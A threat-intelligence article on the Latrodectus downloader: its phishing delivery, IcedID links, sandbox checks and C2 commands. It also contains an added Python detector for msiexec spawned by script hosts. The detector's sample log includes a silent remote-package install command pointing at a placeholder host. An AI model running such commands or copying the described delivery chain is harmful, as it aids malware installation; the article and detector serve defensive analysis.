
Latrodectus Malware

Security analysts have uncovered a novel malware dubbed Latrodectus, which has been circulated through email phishing endeavors since at least late November 2023. Latrodectus stands out as an emerging downloader equipped with diverse sandbox evasion capabilities, meticulously crafted to fetch payloads and execute arbitrary commands.

There are indications implying that the creators of the notorious IcedID malware are likely behind the development of Latrodectus. This downloader is employed by initial access brokers (IABs) to streamline the deployment of other malicious software.

Latrodectus is predominantly associated with two distinct IABs, identified as TA577 (also known as Water Curupira) and TA578. Of note, TA577 has been implicated in the dissemination of QakBot and PikaBot as well.

Latrodectus May Be Superseding Older Malware Threats

By mid-January 2024, Latrodectus had been used predominantly by TA578 in email-based threat campaigns, often delivered through DanaBot infections. TA578, an actor active since at least May 2020, has been associated with various email campaigns distributing Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.

The attack sequences involve exploiting website contact forms to send legal threats regarding purported copyright violations to targeted organizations. Embedded links within these messages redirect recipients to deceptive websites, prompting them to download a JavaScript file responsible for initiating the primary payload via msiexec.
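The delivery step described above (a downloaded JavaScript file that starts the payload through msiexec) leaves a recognisable parent/child relationship in process-creation telemetry. The following detection logic is an added example written for this page; it is not code from the article or from any vendor product. It assumes a simplified key=value event format modelled on process-creation logs, assumes that the JavaScript file is run by the Windows Script Host (wscript.exe or cscript.exe), and uses constructed sample log lines rather than real telemetry.

```python
"""
Added detection example (not part of the original article): flag
process-creation events in which a Windows script host launched msiexec,
the delivery pattern the article attributes to Latrodectus campaigns.
The key=value event format and the sample log lines below are constructed
for illustration and do not come from the article or from real telemetry.
"""
import re
from dataclasses import dataclass

# Script hosts that execute a downloaded .js file on Windows (assumption:
# the campaign's JavaScript file is run by one of these).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Parse key=value pairs; values may be double-quoted (paths with spaces).
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    pid: int
    parent: str
    cmdline: str
    remote_package: bool  # True when msiexec was pointed at a URL


def parse_event(line):
    """Turn one constructed log line into a dict of field -> value."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\X\\y.exe' -> 'y.exe')."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(event):
    """Return a Finding when msiexec.exe was spawned by a script host."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    parent = basename(event.get("ParentImage", ""))
    if parent not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    # A package fetched over HTTP(S) is the more alarming variant.
    remote = re.search(r"https?://", cmdline, re.IGNORECASE) is not None
    return Finding(int(event["ProcessId"]), parent, cmdline, remote)


def scan(lines):
    """Run the check over an iterable of log lines; return all findings."""
    findings = []
    for line in lines:
        finding = is_suspicious(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry). Hosts and paths are
# placeholders; the URL uses the reserved .invalid TLD.
SAMPLE_LOG = [
    r'EventId=1 ProcessId=4120 Image="C:\Windows\System32\msiexec.exe" ParentImage="C:\Windows\System32\wscript.exe" CommandLine="msiexec /i http://example.invalid/pkg.msi /qn"',
    r'EventId=1 ProcessId=4188 Image="C:\Windows\System32\msiexec.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="msiexec /i C:\Users\user\Downloads\setup.msi"',
    r'EventId=1 ProcessId=4200 Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad.exe"',
    r'EventId=1 ProcessId=4250 Image="C:\Windows\SysWOW64\msiexec.exe" ParentImage="C:\Windows\System32\cscript.exe" CommandLine="msiexec /i C:\temp\a.msi /quiet"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"pid={f.pid} parent={f.parent} remote={f.remote_package} cmd={f.cmdline!r}")
```

Only the two events where a script host is the parent of msiexec are reported; an interactive install launched from explorer.exe is left alone. The `remote_package` flag separates the higher-confidence case (a package pulled from a URL) from a local package, so the two can be routed to different alert severities.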

Latrodectus encrypts system data and forwards it to the Command-and-Control server (C2), initiating a request for bot download. Once the bot establishes contact with the C2, it proceeds to solicit commands from it.

The Latrodectus Malware May Carry Out Numerous Invasive Commands

The malware possesses the capability to detect sandboxed environments by verifying the presence of a valid MAC address and a minimum of 75 running processes on systems running Windows 10 or newer.

Similar to IcedID, Latrodectus is programmed to transmit registration details via a POST request to the C2 server, where the fields are concatenated into HTTP parameters and encrypted. Subsequently, it awaits further instructions from the server. These commands empower the malware to enumerate files and processes, execute binaries and DLL files, issue arbitrary directives via cmd.exe, update the bot, and even terminate running processes.

Further scrutiny of the attacker infrastructure reveals that the initial C2 servers became operational on September 18, 2023. These servers are configured to interact with an upstream Tier 2 server established around August 2023.

The association between Latrodectus and IcedID is evident from the T2 server's connections with backend infrastructure linked to IcedID, along with the utilization of jump boxes previously tied to IcedID operations.

Researchers anticipate a surge in Latrodectus usage by financially motivated threat actors in the criminal realm, especially those who have previously disseminated IcedID.
